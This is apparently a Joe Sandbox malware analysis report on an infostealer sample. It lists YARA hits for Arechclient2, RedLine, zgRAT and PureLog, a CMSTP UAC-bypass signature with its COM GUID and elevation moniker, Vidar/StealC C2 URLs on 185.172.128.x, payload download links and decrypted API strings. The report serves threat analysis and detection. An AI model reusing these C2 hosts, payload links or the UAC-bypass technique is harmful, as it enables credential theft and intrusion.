25.2.MSBuild.exe.1100000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
17.2.cmd.exe.546b264.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.cmd.exe.546b264.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
3.2.cmd.exe.5e100c8.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.cmd.exe.5e100c8.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.cmd.exe.5e100c8.8.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
15.2.run.exe.3e96d5b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.run.exe.3e96d5b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.run.exe.3e9615b.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.run.exe.3e9615b.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
17.2.cmd.exe.546be64.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.cmd.exe.546be64.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
3.2.cmd.exe.542e976.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.542e976.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
5.0.u42w.3.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x33fd85:$s1: file:/// 0x33fc95:$s2: {11111-22222-10009-11112} 0x33fd15:$s3: {11111-22222-50001-00000} 0x1b26e8:$s4: get_Module 0x2b78fa:$s4: get_Module 0x33df48:$s4: get_Module 0x1b3b3b:$s5: Reverse 0x1f3faf:$s5: Reverse 0x33e22e:$s5: Reverse 0x2c3c13:$s6: BlockCopy 0x35c69c:$s6: BlockCopy 0x2b9dde:$s7: ReadByte 0x33fd97:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1fddd5:$s1: file:/// 0x1fdce1:$s2: {11111-22222-10009-11112} 0x1fdd65:$s3: {11111-22222-50001-00000} 0x1fbfe0:$s4: get_Module 0x36d6d:$s5: Reverse 0x1fc30d:$s5: Reverse 0x3b9b4:$s6: BlockCopy 0x1f91ea:$s6: BlockCopy 0x372b2:$s7: ReadByte 0x1fdde7:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x366b8f:$s1: file:/// 0x366a9f:$s2: {11111-22222-10009-11112} 0x366b1f:$s3: {11111-22222-50001-00000} 0x1d94f2:$s4: get_Module 0x2de704:$s4: get_Module 0x364d52:$s4: get_Module 0x1da945:$s5: Reverse 0x21adb9:$s5: Reverse 0x365038:$s5: Reverse 0x2eaa1d:$s6: BlockCopy 0x3834a6:$s6: BlockCopy 0x2e0be8:$s7: ReadByte 0x366ba1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x31b97b:$s1: file:/// 0x31b88b:$s2: {11111-22222-10009-11112} 0x31b90b:$s3: {11111-22222-50001-00000} 0x18e2de:$s4: get_Module 0x2934f0:$s4: get_Module 0x319b3e:$s4: get_Module 0x18f731:$s5: Reverse 0x1cfba5:$s5: Reverse 0x319e24:$s5: Reverse 0x29f809:$s6: BlockCopy 0x338292:$s6: BlockCopy 0x2959d4:$s7: ReadByte 0x31b98d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x20e3df:$s1: file:/// 0x20e2eb:$s2: {11111-22222-10009-11112} 0x20e36f:$s3: {11111-22222-50001-00000} 0x20c5ea:$s4: get_Module 0x47377:$s5: Reverse 0x20c917:$s5: Reverse 0x4bfbe:$s6: BlockCopy 0x2097f4:$s6: BlockCopy 0x478bc:$s7: ReadByte 0x20e3f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x21d805:$s1: file:/// 0x21d711:$s2: {11111-22222-10009-11112} 0x21d795:$s3: {11111-22222-50001-00000} 0x21ba10:$s4: get_Module 0x5679d:$s5: Reverse 0x21bd3d:$s5: Reverse 0x5b3e4:$s6: BlockCopy 0x218c1a:$s6: BlockCopy 0x56ce2:$s7: ReadByte 0x21d817:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 73 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.172.128.59/syncUpd.exe	Avira URL Cloud: Label: malware
Source: http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	Avira URL Cloud: Label: malware
Source: http://185.172.128.203/tiktok.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\cqecfsbe	Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Source: u42w.0.exe.1720.1.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Multi AV Scanner detection for domain / URL

Source: http://185.172.128.76/3cd2b41cbde8fc9c.php	Virustotal: Detection: 13%	Perma Link
Source: http://185.172.128.228/BroomSetup.exe	Virustotal: Detection: 22%	Perma Link
Source: 185.172.128.76/3cd2b41cbde8fc9c.php	Virustotal: Detection: 13%	Perma Link
Source: http://185.172.128.76/15f649199f40275b/mozglue.dll5	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.76/15f649199f40275b/sqlite3.dll	Virustotal: Detection: 8%	Perma Link
Source: http://185.172.128.59/syncUpd.exe	Virustotal: Detection: 22%	Perma Link
Source: http://185.172.128.76	Virustotal: Detection: 9%	Perma Link
Source: http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	Virustotal: Detection: 20%	Perma Link
Source: http://185.172.128.203/tiktok.exe	Virustotal: Detection: 19%	Perma Link
Source: http://185.172.128.203/tiktok.exe00	Virustotal: Detection: 15%	Perma Link
Source: http://185.172.128.76/15f649199f40275b/softokn3.dllI	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.76/15f649199f40275b/sqlite3.dll9	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	Virustotal: Detection: 38%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	Virustotal: Detection: 38%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\cqecfsbe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\cqecfsbe	Virustotal: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	Virustotal: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dll	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for submitted file

Source: g77dRQ1Csm.exe

Virustotal: Detection: 40%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\cqecfsbe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: g77dRQ1Csm.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: lstrcatA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: OpenEventA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CreateEventA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CloseHandle
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Sleep
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: VirtualFree
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: lstrlenA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: ExitProcess
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: user32.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: ntdll.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CreateDCA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: sscanf
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: HAL9TH
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: JohnDoe
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: DISPLAY
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: http://185.172.128.76
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: /3cd2b41cbde8fc9c.php
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: /15f649199f40275b/
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: default10
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GlobalLock
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: HeapFree
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetFileSize
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GlobalSize
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Process32Next
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Process32First
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: LocalFree
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: FindClose
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: ReadFile
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: WriteFile
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CreateFileA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CopyFileA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetLastError
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GlobalFree
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: OpenProcess
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: ole32.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: wininet.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: shell32.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: psapi.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SelectObject
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: BitBlt
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: DeleteObject
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GdipFree
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CoInitialize
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetDC
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CloseWindow
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: wsprintfA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CharToOemW
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: wsprintfW
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SHGetFolderPathA
